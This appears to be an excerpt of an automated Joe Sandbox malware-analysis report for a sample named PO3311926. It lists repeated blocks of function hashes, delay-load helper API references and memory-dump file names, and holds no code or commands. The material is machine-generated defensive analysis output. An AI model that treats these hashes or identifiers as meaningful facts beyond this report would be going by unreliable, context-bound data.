                                                                                              • Instruction ID: 3938156ff77f425370d9cb93d692401774b70fe0a28ad445f63939969f796b91
                                                                                              • Opcode Fuzzy Hash: 155053dd01a6ad98ac383aeb36311e4c29ee6f1edc7be2d2fe8f238aa1e5afe3
                                                                                              • Instruction Fuzzy Hash: 9EB092E1258041AE2604510A6D02DBA41CDC084B1033080AAB826C01A0E880AA014431
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 4d9f9682c8edd506657151fa2b4a9b006c8e206a209ebc5bcb14bc4b3ddf1b8f
                                                                                              • Instruction ID: 4acb615562c812ba471d84d5567be503e9e5fb0733e8e6cd749909c07b031d41
                                                                                              • Opcode Fuzzy Hash: 4d9f9682c8edd506657151fa2b4a9b006c8e206a209ebc5bcb14bc4b3ddf1b8f
                                                                                              • Instruction Fuzzy Hash: B0B092E1258141AE264451096C02CBA01CDC084B1033081AAB826C01A0E880A9404431
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: bb7e3130acf90742ec06394593522c979674884e9b1ed99b6b2d8a9bbbe95b13
                                                                                              • Instruction ID: 99eabbdcf34f91c845a1a19a0f8be7cd1ae7e8381bdfd34e0a7f66d57a8a2de7
                                                                                              • Opcode Fuzzy Hash: bb7e3130acf90742ec06394593522c979674884e9b1ed99b6b2d8a9bbbe95b13
                                                                                              • Instruction Fuzzy Hash: C7B092E1259041AE260451096C02CBA01CDC085B10330C0AAB826C01A0E880E9004471
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 1c98f37f4dfa42781c5ae948ecf00ff1cc614df9ef4f352199b10c22877cd38b
                                                                                              • Instruction ID: f6f4a87f9ccaaaf3fcd26236b4bd16d6b9bad3c4f62b89f54f2c7b2cb0f67f31
                                                                                              • Opcode Fuzzy Hash: 1c98f37f4dfa42781c5ae948ecf00ff1cc614df9ef4f352199b10c22877cd38b
                                                                                              • Instruction Fuzzy Hash: D3B012E1258041EE3504520A6D03CFB41CDC0C4B10330C0BFF825C02E0FCD0ED494431
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 32c63ab802375f0e0fcb3203d07fe85537e607cc4c88da8f93185214f63be6a0
                                                                                              • Instruction ID: cf1a8e9b5be076a582764ca3b729303349fb38f377135e46aa9d96daaefa0fe8
                                                                                              • Opcode Fuzzy Hash: 32c63ab802375f0e0fcb3203d07fe85537e607cc4c88da8f93185214f63be6a0
                                                                                              • Instruction Fuzzy Hash: F5B092E1258181AE254452096C02CBA01CDC084B10330C1AAB825C02A0E880A8444431
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: e9a029d8353b7e672aa6443f3e6d44eb2cae12331411391d5852677c410cdca9
                                                                                              • Instruction ID: 281a23b6fea45782e252292f3bba7ae8b4c019f97fd7135a0513ad79e5f467c0
                                                                                              • Opcode Fuzzy Hash: e9a029d8353b7e672aa6443f3e6d44eb2cae12331411391d5852677c410cdca9
                                                                                              • Instruction Fuzzy Hash: C3B012E1258041AE350451196C03CFF01DDC0C5B10330C0BFFD25C01E0F9C0EC004471
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a60d37fca1b571d82daf56845ff221e0cf47cfe4276818af3100c948a94b9e02
                                                                                              • Instruction ID: f9ddc8c9413f300892acb9bd3ac52ffcaa4c25878353ebaeb2c8742f909289a9
                                                                                              • Opcode Fuzzy Hash: a60d37fca1b571d82daf56845ff221e0cf47cfe4276818af3100c948a94b9e02
                                                                                              • Instruction Fuzzy Hash: 7EB012E126D081AE350451096C03CFB01CED4C8B10330C0BFF826C41E0F8C0EC004431
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 9184ab7c86227272f5cb286abe16325c8d16286ec8570b36a16a9de9c79b47af
                                                                                              • Instruction ID: f0504a4b18d24b88d541c84a549a8c647894f9f7626aa0d428161b5c1443c786
                                                                                              • Opcode Fuzzy Hash: 9184ab7c86227272f5cb286abe16325c8d16286ec8570b36a16a9de9c79b47af
                                                                                              • Instruction Fuzzy Hash: 1AB092E1259181AE254452096C02CBA01CEC084B1033081AAB825C41A0E880A8444431
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 59840227cd83fe48ba1aa5430dd52f8e69c48a532431a882459064bbb8577af2
                                                                                              • Instruction ID: de30e16d008cec934061bbd377161b56246d007891d2fe880420a42708c6ac24
                                                                                              • Opcode Fuzzy Hash: 59840227cd83fe48ba1aa5430dd52f8e69c48a532431a882459064bbb8577af2
                                                                                              • Instruction Fuzzy Hash: D5B012E125D081AE350451096C03CFB01CEC0C5B10330C0BFFC25D41E0F8C0EC004471
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE3FC
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: fd8c88069e01b8949bbc7352fecc8206260b57322a6d770bbcbe684b051a93d7
                                                                                              • Instruction ID: b7c33bec8274a5b16900be60020d66cd15fe9d08b7992b01f1e29e35aebf4909
                                                                                              • Opcode Fuzzy Hash: fd8c88069e01b8949bbc7352fecc8206260b57322a6d770bbcbe684b051a93d7
                                                                                              • Instruction Fuzzy Hash: 77B012F125A041BE368492045C42CF702CDC0C0F1033080BFF824C61E0F8C0CE005473
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE3FC
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 6f1755390c58a20950644e514df670703f2f3709e2cc35a68a60bc93c075b8b7
                                                                                              • Instruction ID: d7a5fb9a4184804d4b5d4f7bd94ec45fa4e89af2455cd7da4b926dd1b2d16468
                                                                                              • Opcode Fuzzy Hash: 6f1755390c58a20950644e514df670703f2f3709e2cc35a68a60bc93c075b8b7
                                                                                              • Instruction Fuzzy Hash: 48B012E12590417E358452055D42CF742CDC0C0B10330C0BFF524C61E0F8C0CC495473
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE3FC
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 11e5c18d156ae203ae8cfb27e83824090620bd94e82a172bd0c6c737dcc54d4c
                                                                                              • Instruction ID: 040f42991ed25d7dc902671a1a30d87d27e3585b9a9dd8236a7042f500560b5c
                                                                                              • Opcode Fuzzy Hash: 11e5c18d156ae203ae8cfb27e83824090620bd94e82a172bd0c6c737dcc54d4c
                                                                                              • Instruction Fuzzy Hash: 84B012E1259141BE358492045C42CF702CDC0C0B10330C0BFF824C61E0F8C0CC045473
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE580
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 681a7950bad51bb239d2c712df164a8028bd0f973efd3477362e8fdb67153bb3
                                                                                              • Instruction ID: a6e6b5702cc13f84b00c47e16eaa4a4d74263060fcab91eedf6d0d491c632887
                                                                                              • Opcode Fuzzy Hash: 681a7950bad51bb239d2c712df164a8028bd0f973efd3477362e8fdb67153bb3
                                                                                              • Instruction Fuzzy Hash: 22B012D12581417E354851549C0BCFB01EDC4C4B1033042AFF424C21E0F8C0CD404435
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE580
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: e5d944eb6f81f41038e27b94c9dd94e0e3364993028860750d27268a5c49d878
                                                                                              • Instruction ID: 339dc7d5fb6b2867aa59ffeae70e8894da552d1f0295f0134f97f8624d651135
                                                                                              • Opcode Fuzzy Hash: e5d944eb6f81f41038e27b94c9dd94e0e3364993028860750d27268a5c49d878
                                                                                              • Instruction Fuzzy Hash: 03B012D12580417E350851559D06CFB41EDC4C4B1033042AFF424C21E0FCC0CE014435
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE580
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5081b08870b27903bace6d13f3ccf6028b360500f5ebe1d48461da2425d6fcb5
                                                                                              • Instruction ID: bcb0dadce7fbbd4595cc392a331e96148f4f0af57ba22b9c8d8d809d98d3a842
                                                                                              • Opcode Fuzzy Hash: 5081b08870b27903bace6d13f3ccf6028b360500f5ebe1d48461da2425d6fcb5
                                                                                              • Instruction Fuzzy Hash: 0DB012D12580417F350852545C02CFB01CDC5C8B1033040AFF824C21E0F8C0CC044435
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE51F
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
